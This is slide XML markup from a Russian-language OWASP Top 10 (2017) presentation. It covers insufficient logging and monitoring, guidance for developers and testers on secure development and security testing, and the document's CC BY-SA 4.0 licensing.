            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), а также программы корреляции журналов с настраиваемыми панелями и предупреждениями.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A10</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>журналирования</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>мониторинга</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3946078825"/>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эксплуатации:</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обнаружения:</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Технические:</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Эксплуатация недостатков </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>журналирования</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и мониторинга лежит в основе почти всех крупных взломов.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>При проведении атак злоумышленники полагаются на отсутствие контроля и своевременного реагирования на инциденты.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700" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>отраслевых исследований</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="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Одним из способов определить качество мониторинга является анализ журналов после проведения теста на проникновение. Для определения возможного ущерба все действия </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>тестировщиков</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> должны регистрироваться соответствующим образом.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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Большинство атак начинаются с анализа уязвимостей. Возможность проведения подобного анализа повышает вероятность удачной эксплуатации уязвимости практически до 100%. </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2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>В 2016 году обнаружение факта проникновения занимало </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>в среднем 191 день</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> — нанесенный за это время ущерб мог быть огромным.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7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36385" y="1061610"/>
            <a:ext cx="542925" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180170" y="1061610"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101250" y="1061610"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545655" y="1186145"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId21"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855880" y="1496045"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11240" y="1516242"/>
            <a:ext cx="990600" cy="39052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185870637"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="814736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sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Разработайте и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>применяйте воспроизводимые методы </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>и стандарты обеспечения безопасности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Для новичков, а также специалистов, уже хорошо знакомых с проблемами безопасности веб-приложений, создание безопасного веб-приложения или устранение уязвимостей в уже существующем может оказаться непростой задачей. При работе с большим набором приложений задача может показаться невыполнимой.</a:t>
                      </a:r>
                    </a:p>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Чтобы помочь организациям и разработчикам экономически эффективно уменьшить риски, связанные с безопасностью приложений, OWASP создал множество </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>бесплатных и общедоступных</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ресурсов. Ниже представлены некоторые решения OWASP, позволяющие организациям создавать безопасные веб-приложения и API. На следующей странице представлены дополнительные ресурсы OWASP, предназначенные для проверки безопасности приложений и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sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Существует множество дополнительных ресурсов OWASP. Посетите </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>страницу проектов OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, где на вкладке </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Inventory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> перечислены проекты </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flagship</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Labs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Incubator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Большинство ресурсов OWASP доступны на нашей </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Вики</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, а также многие документы OWASP можно заказать в </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>бумажном или электронном</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> виде.</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32906"/>
              <a:ext cx="5608321" cy="89341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Чтобы создать </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" u="sng" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>безопасное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веб-приложение, необходимо сначала разработать требования к его безопасности. Для этих целей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 аутсорсинге используйте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8"/>
                </a:rPr>
                <a:t>Приложение по безопасности к Контракту на разработку ПО от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Вместо добавления механизмов обеспечения безопасности в готовые приложения и API экономически выгоднее встраивать их на этапе разработки. В качестве руководства при разработке безопасного приложения с нуля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9"/>
                </a:rPr>
                <a:t>Памятки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Архитектура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приложения</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4990881"/>
              <a:ext cx="5608321" cy="84512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Сложно создать надежные и практичные средства обеспечения безопасности. Использование стандартных средств значительно упрощает разработку безопасных приложений и API.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hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>Проактивная</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10"/>
                </a:rPr>
                <a:t> защита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является хорошим пособием для разработчиков, более того, сейчас многие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предоставляют стандартные средства контроля безопасности авторизации, защиты от межсайтовой подмены запросов и т. п.</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Стандартные средства обеспечения безопасности</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Для усовершенствования процесса создания приложений и API рекомендуется использовать </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Модель обеспечения безопасности ПО (SAMM) от OWASP</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которая позволяет разработать и реализовать методику обеспечения безопасности ПО, подходящую для конкретной организации.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Образовательный проект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предоставляет материалы для обучения разработчиков безопасности веб-приложений. Для практических занятий используйте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или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уязвимые веб-приложения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Чтобы оставаться в курсе, посещайте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Конференции OWASP AppSec</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тренинги или собрания региональных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отделений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Обучение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 </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приложений</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+Р</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Что делать разработчикам</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sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Требования к безопасности приложения</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Жизненный цикл безопасной разработки</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958893676"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="817019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7">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Внедрите постоянное тестирования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3">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Написать безопасный код — важно, но еще важнее подтвердить правильность реализации и использования разработанных средств защиты. Тестирование безопасности приложения проводится как раз для этих целей. Задача эта сложная и комплексная. Современные методы разработки, такие как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Agile</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DevOps</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оказывают сильное влияние на традиционные подходы и средства, поэтому мы настоятельно рекомендуем определить критичность компонентов ваших приложений и подобрать эффективные методы работы с ними.</a:t>
                      </a:r>
                    </a:p>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Современные угрозы быстро эволюционируют, поэтому одного сканирования или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пентеста</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приложений в год уже недостаточно. Современная разработка требует тестирования безопасности в течение всего цикла разработки. Попробуйте улучшить процесс через автоматизацию безопасности. Необходимо также учесть ежегодные расходы на тестирование, экспресс-анализ, исправление, повторное тестирование и развертывание приложения, помноженные на количество поддерживаемых приложений.</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+Т</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Что делать тестировщикам</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Перед началом тестирования убедитесь, что правильно расставили приоритеты, исходя из модели угроз. Если у вас нет модели, ее необходимо разработать. Используйте для этого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 (ASVS)</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тестированию</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="950">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> от OWASP. Не полагайтесь на инструменты вендоров для определения критичных компонентов вашего бизнеса.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Подход к тестированию безопасности приложения должен соответствовать команде, процессам и инструментам, используемым в течение жизненного цикла разработки ПО. Использование дополнительных шагов, этапов и проверок может привести к разногласиям, попыткам их обхода и нежеланию масштабироваться. Ищите подходящие способы сбора данных о безопасности и внедрения их в ваши процессы.</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15186"/>
              <a:ext cx="5549303" cy="8497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Выберите самый простой, быстрый и точный способ проверки каждого требования. Используйте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6"/>
                </a:rPr>
                <a:t>Фреймворк знаний по безопасности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от OWASP для определения функциональных и нефункциональных требований к безопасности, а также проведения комплексных испытаний. Не забывайте про специалистов, которые будут заниматься ложными срабатываниями или </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>несрабатываниями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автоматических инструментов.</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Стратегии тестирования</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Необязательно начинать тестировать все подряд. Начните с самого важного и постепенно расширяйте программу проверок, т. е. увеличивайте количество автоматических проверок безопасности и уязвимостей, а также количество проверяемых приложений и API. Цель — достичь состояния, когда основные параметры безопасности всех приложений и API проверяются непрерывно.</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Охват и точность</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Неважно, насколько хорошо проведено тестирование, если вы не можете грамотно сообщить о результатах. Добейтесь доверия, показав, что вы понимаете принцип работы приложения. Четко, без жаргонизмов, опишите способы и сценарии атак. Оцените реальную сложность обнаружения и эксплуатации уязвимостей, а также серьезность последствий. Наконец, сообщите о результатах исследования средствами, используемыми разработчиками, не в PDF-файлах.</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модели угроз</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жизненного цикла разработки </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="ru-RU" sz="1050" b="1">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sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Сообщайте о результатах правильно</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="ru-RU" sz="1050" b="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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70932435"/>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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Авторские права и Лицензирование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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Авторские права © 2003 - 2017 Фонд OWASP</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smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Документ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>выпущен под лицензией </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Creative</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Commons</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Attribution</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Share-Alike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 4.0. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>В случае </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>переиспользования</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> или распространения данного документа необходимо указывать условия лицензионного соглашения, действующие в его отношении.</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rtl="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250972"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="7008415"/>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448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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2967">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Открытый проект по обеспечению безопасности веб-приложений (OWASP) — это открытое сообщество, позволяющее</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>организациям разрабатывать, приобретать и поддерживать безопасные приложения и интерфейсы прикладного программирования (API). </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
